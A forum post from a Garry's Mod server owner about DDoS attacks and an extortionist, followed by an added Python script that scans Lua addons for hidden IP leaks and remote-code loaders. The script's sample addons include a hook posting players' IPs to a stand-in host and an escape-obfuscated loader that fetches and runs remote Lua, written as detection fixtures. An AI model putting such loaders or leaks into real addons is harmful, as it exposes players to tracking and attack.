Possible DDoS exploit left unpatched, users being booted entirely offline after ~10 minutes of play
Hey there.
I've been having some issues with a server of mine recently which have forced me to temporarily close it down as a result. I've been noticing (and attributing to bad ISPs until recently) users being booted offline after a certain amount of time of playing on my Garry's Mod server. And I mean entirely offline, as I've experienced myself. Usually it's for about 5-10 minutes, with a heavy bit of packet flooding. The first few times, it appeared to be an NTP-reflection attack, but it's since changed. Still some sort of reflection, as I can't seem to find any sort of IP address that would be some kind of personal address. They're all IPs in datacenters and stuff like that, which don't help much.
I've been looking through a lot of my Lua scripts and addons to see if any have been compromised, to little avail. No Lua script seems to be making any malicious calls, ie http.Fetch, http.Post, Player:IPAddress, etc. This leads me to believe this is some sort of exploit involving the game itself, which is leaking IPs to the attacker.
I've had someone step forward claiming to be the attacker in question, who stated that they demand my server be taken offline and/or switched away from all three very popular gamemodes: TTT, Murder, and Prophunt. They've warned that the attacks will continue, and possibly intensify, if things get any worse. The problem is, this person is hiding behind a Discord username, running through the Discord web client (I know this because, when I took the Discord invite link away from my Steam group, they stopped joining the Discord server), which makes it very hard to actually get any information on who they might be. I have speculations they may be a rival server owner, even one I may already know, but their only response when I asked them what they wanted when I had a chance to speak with them was "I have my reasons".
Claims from this/these attacker(s) range from mere DDoS threats to compromised clients that spread some "virus" around similar to other infections in the past, ie the *cough* *cough* exploit. I've searched through my game files and attempted running multiple virus scans with no results, so I find it improbable that that's the case, but it's still not impossible.
I've done some searching through my addons and Lua scripts, as I said, but I've found very little of interest. I haven't been able to search every Workshop addon, and I'm running some stuff off ScriptFodder, but the latter should be clean, and the former addons are used fairly widely.
Here's a link to my server's Workshop collection, in case anything stands out (please ignore the server name):
[B]Serverside:[/B] [URL]http://steamcommunity.com/sharedfiles/filedetails/?id=345579207[/URL]
[B]Clientside:[/B] [URL]http://steamcommunity.com/sharedfiles/filedetails/?id=329047765[/URL]
And here's a link to the collection of legacy addons and Lua scripts we have on the server (ScriptFodder addons removed for obvious reasons):
[URL]https://www.dropbox.com/s/aa5ct152skdhabq/ponypwn2_game_lua.zip?dl=0[/URL]
Some info about my server:
[B]Provider: [/B]Nuclear Fallout
[B]ScriptFodder Addon List:[/B]
- [URL="https://scriptfodder.com/scripts/view/22"]HatsChat 2[/URL]
- [URL="https://scriptfodder.com/scripts/view/531"]TTT Battlefield 4 HUD[/URL] (added after attacks started happening)
- [URL="https://scriptfodder.com/scripts/view/391"]TTT Custom UI[/URL]
- [URL="https://scriptfodder.com/scripts/view/460"]!cake Anti-Cheat[/URL]
- [URL="https://scriptfodder.com/scripts/view/32"]Advanced Name Matching for ULX[/URL]
- [URL="https://scriptfodder.com/scripts/view/1424"]Wyozi Advanced TTT[/URL]
- [URL="https://scriptfodder.com/scripts/view/673"]Atmosphere Airlines[/URL]
- [URL="https://scriptfodder.com/scripts/view/326"]Flat Load[/URL] (not on server)
At this point, I'm at a loss. As I've said, I've taken the precautionary measure and shut down my server for the time being, as hard as it is. The attacker claims that I have a 30-day grace period, and, if the server has been down for that long, all "infected clients" will be "cleaned", so they can't do anything if they tried. Of course, I have a hard time believing clients are infected anyway, but it doesn't hurt to think worst case scenario. The attacker also claims it is very easy to re-infect my server, basically saying that, if I don't stop using TTT, Prophunt, or Murder, I'm still going to be under fire. Even after the 30 day period.
I've made a backup of every server file I'd care about, and dropped them on my drive, which is where the Lua dump came from. If anything comes of this and I'm able to start up again, I'm able. I really do hope something comes of this, because i really love running this community, and to see this happen like this hurts.
I can't really report any exact endpoints for any security holes, but I can say there is more than likely one with my server, whether it's on one of the addons' ends or the game's. If anyone can offer any help in this situation, that would be nice.
One other detail: The attacker also reports to have automated the process of booting users offline with some sort of script, which he claims scans the server by IP or by keyword, and looks for my server. He claims to only be targeting pony servers in those three gamemodes, as those are the gamemodes he claims to play most often. I have little more than that to say about the hacker, other than that they were pretty damn smug about the whole situation. "I hold all the cards now." Heh.
Seriously, though. Any help that can be offered is [B]extremely appreciated[/B]. I love my community, love running this server, and I'd hate to see its doors close after almost 4 consecutive years, especially over one person. Right now, I have a very, very weak profile on the attacker, and that most certainly won't hold up in a formal case with authorities. I'm left at a decision with two choices, each with their own flavor of poison: ignore the person and keep the community running, at the cost of users' safety and the risk of the attacks intensifying, or comply, which [B]should[/B] (no guarantees) keep the players safe at the cost of my entire community. Really tough choice there...
Thank all of you in advance for any help you can provide. I really hope something comes of this.
[B]TL;DR:[/B] Someone is exploiting my server in some way and booting some of my players offline at random intervals after about 5-10 minutes. I can't find any compromised addons, so I think it might be the game's issue. The attacker has revealed very little about themselves, if they are even the attacker, and they're saying some pretty scary (but likely improbable) things. Help is appreciated.
[B]Edit:[/B] Something I forgot to mention: The attacker commented on how I'm "still looking at Lua" as if the vulnerability wasn't in Lua, but instead somewhere else.
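The post describes grepping the server's Lua for http.Fetch, http.Post and Player:IPAddress. A plain grep misses the forms an addon author would use to hide exactly those calls: numeric string escapes ("\104\116\116\112" is "http"), bracket indexing through _G, and code fetched at runtime and handed to RunString. The scanner below is an added example, not code from the original post or from any of the listed addons; the three sample scripts in SAMPLE_ADDONS are constructed for illustration and are not taken from the server's collection. It decodes escapes and rewrites t["name"] as t.name before matching, so the obfuscated loader is reported alongside the obvious leak.

```python
"""Audit Garry's Mod Lua addons for calls that can leak player IPs or execute
fetched code.  Added example; the sample scripts are constructed, not real."""
import re
from typing import Dict, List, Tuple

# Rules applied to each *normalised* source line (see normalise()).
RULES: List[Tuple[str, re.Pattern]] = [
    ("outbound-http",   re.compile(r"\bhttp\.(Fetch|Post)\b|\bHTTP\s*\(")),
    ("ip-disclosure",   re.compile(r":IPAddress\s*\(|\bgame\.GetIPAddress\s*\(")),
    ("dynamic-code",    re.compile(r"\b(RunString|RunStringEx|CompileString)\s*\(")),
    ("global-indirect", re.compile(r"\b_G\b")),
]
# Applied to the raw line: a run of four or more numeric/hex escapes is a
# common way to keep the word "http" out of a grep.
ESCAPE_RUN = re.compile(r"(?:\\(?:\d{1,3}|x[0-9A-Fa-f]{2})){4,}")

_DEC = re.compile(r"\\(\d{1,3})")
_HEX = re.compile(r"\\x([0-9A-Fa-f]{2})")
_IDX = re.compile(r'\[\s*["\']([A-Za-z_]\w*)["\']\s*\]')


def normalise(line: str) -> str:
    """Decode \\ddd and \\xHH escapes and rewrite t["name"] as t.name so that
    obfuscated references look like the plain form the rules expect."""
    line = _HEX.sub(lambda m: chr(int(m.group(1), 16)), line)
    line = _DEC.sub(
        lambda m: chr(int(m.group(1))) if int(m.group(1)) < 256 else m.group(0),
        line,
    )
    return _IDX.sub(r".\1", line)


def scan_source(path: str, src: str) -> List[Dict]:
    """Return one finding per (line, rule) hit; line numbers are 1-based."""
    findings: List[Dict] = []
    for no, raw in enumerate(src.splitlines(), start=1):
        if ESCAPE_RUN.search(raw):
            findings.append({"file": path, "line": no,
                             "rule": "escaped-string", "text": raw.strip()})
        norm = normalise(raw)
        for name, rx in RULES:
            if rx.search(norm):
                findings.append({"file": path, "line": no,
                                 "rule": name, "text": norm.strip()})
    return findings


def scan_addons(addons: Dict[str, str]) -> List[Dict]:
    """Scan a mapping of path -> Lua source (e.g. read from an addons tree)."""
    out: List[Dict] = []
    for path, src in sorted(addons.items()):
        out.extend(scan_source(path, src))
    return out


# Constructed sample addons (hypothetical paths and hostnames).
SAMPLE_ADDONS: Dict[str, str] = {
    # Harmless clientside HUD: should produce no findings.
    "clean_hud/lua/autorun/client/hud.lua": (
        'hook.Add("HUDPaint", "ExampleHUD", function()\n'
        '    draw.SimpleText("Hello", "DermaDefault", 10, 10)\n'
        'end)\n'
    ),
    # Obvious leak: posts each joining player\'s IP to an outside host.
    "leaky/lua/autorun/server/report.lua": (
        'hook.Add("PlayerInitialSpawn", "Report", function(ply)\n'
        '    http.Post("http://collector.example.invalid/add",\n'
        '        { ip = ply:IPAddress(), sid = ply:SteamID() })\n'
        'end)\n'
    ),
    # Hidden loader: _G["\\104\\116\\116\\112"]["\\70\\101\\116\\99\\104"]
    # is _G.http.Fetch; whatever it downloads is executed with RunString.
    "hidden/lua/autorun/server/loader.lua": (
        '_G["\\104\\116\\116\\112"]["\\70\\101\\116\\99\\104"]'
        '("http://cdn.example.invalid/p.lua", function(b)\n'
        '    RunString(b)\n'
        'end)\n'
    ),
}


if __name__ == "__main__":
    for f in scan_addons(SAMPLE_ADDONS):
        print(f"{f['file']}:{f['line']} [{f['rule']}] {f['text']}")
```

To run it over a real server, replace SAMPLE_ADDONS with a dict built by walking the addons and lua directories. The normalisation still misses one common trick: aliasing the function through a local (local h = _G.http; h.Fetch(...)) spreads the reference over two lines, so a hit on global-indirect or escaped-string anywhere in a file is worth reading in full rather than treating the rule matches as the whole story.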